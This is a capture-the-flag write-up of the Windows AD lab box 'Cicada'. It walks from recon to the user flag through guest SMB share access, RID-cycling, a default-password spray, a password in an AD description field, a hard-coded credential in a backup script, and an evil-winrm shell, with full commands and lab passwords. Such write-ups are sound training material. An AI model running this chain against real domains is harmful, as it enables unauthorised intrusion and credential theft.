Cicada
A guest-readable SMB share leaks a default new-hire password, RID-cycling enumerates the domain user list, and a password spray plus credentials chained through an AD description field and a hard-coded backup script lands a WinRM shell and the user flag.
Overview
Cicada is an easy-difficulty Windows box built around a misconfigured Active Directory domain. The whole path to user is a credential-chaining exercise: the guest account can read an HR share that contains a default onboarding password, RID-cycling turns the domain into a known user list, and a password spray finds the one user who never rotated the default. From there, a password sitting in an AD description attribute unlocks a second share, whose backup script hard-codes the credentials of a WinRM-capable account. This post covers recon through the user flag.
Machine Matrix
Pure AD credential-chaining: guest SMB share, RID-cycling, password spray, AD description and hardcoded backup-script secrets — enumeration-heavy and highly realistic with no CVE.
Recon
| Port | Service | Notes |
|---|---|---|
| 53/tcp | DNS | Windows domain |
| 88/tcp | Kerberos | domain cicada.htb |
| 135/tcp | MSRPC | endpoint mapper |
| 139/445/tcp | SMB | guest access enabled |
| 389/636/tcp | LDAP/LDAPS | Active Directory |
| 5985/tcp | WinRM | remote management |
1
nmap -sC -sV -Pn 10.10.10.X
The Kerberos, LDAP, and SMB trio confirms a Windows domain controller for cicada.htb. Add the host so name-based tooling resolves:
1
2
# paste manually into /etc/hosts
10.10.10.X cicada.htb
Enumeration
SMB allows the built-in guest account to authenticate with an empty password. Enumerate shares with it:
1
netexec smb cicada.htb -u 'guest' -p '' --shares
The HR share is readable. Pull its contents:
1
2
smbclient //cicada.htb/HR -U 'guest%' -c "ls; get \"Notice from HR.txt\" /tmp/notice.txt"
grep -i password /tmp/notice.txt
Notice from HR.txt is a new-hire onboarding note that hands out the default password issued to every employee:
1
Cicada$M6Corpb*@Lp#nZp!8
A password is only useful with usernames. Even a guest session can resolve SIDs to names over the lsarpc pipe, so RID-cycle the full domain user list:
1
2
impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass | grep SidTypeUser
impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass | grep SidTypeUser | sed -E 's/.*\\(.*) \(SidTypeUser\)/\1/' > users.txt
Foothold
1 — Spray the default password. One password against many users avoids lockout while finding whoever never changed the default:
1
netexec smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
That hits michael.wrightson.
2 — Leak a password from an AD description. With a valid domain account, enumerate user objects — their description attributes are world-readable to authenticated users, and people store secrets there:
1
netexec smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
david.orelious has his password parked in plain sight in his description field (aRt$Lp#7t*VQ!3).
3 — Read the DEV share for hard-coded creds. david.orelious has READ on a second share:
1
2
3
netexec smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
smbclient //cicada.htb/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3' -c "ls; get Backup_script.ps1 /tmp/Backup_script.ps1"
grep -iE 'username|password' /tmp/Backup_script.ps1
Backup_script.ps1 wraps a credential in ConvertTo-SecureString ... -AsPlainText -Force — reversible plaintext, not a secret. It hands over emily.oscars : Q!3@Lp#M6b*7t*Vt, and that account is a member of Remote Management Users.
User flag
emily.oscars can log in over WinRM:
1
evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i cicada.htb
1
2
type C:\Users\emily.oscars.CICADA\Desktop\user.txt
# [redacted]
The WinRM shell and the user flag are ours.
Privilege escalation is left as an exercise — this post stops at user.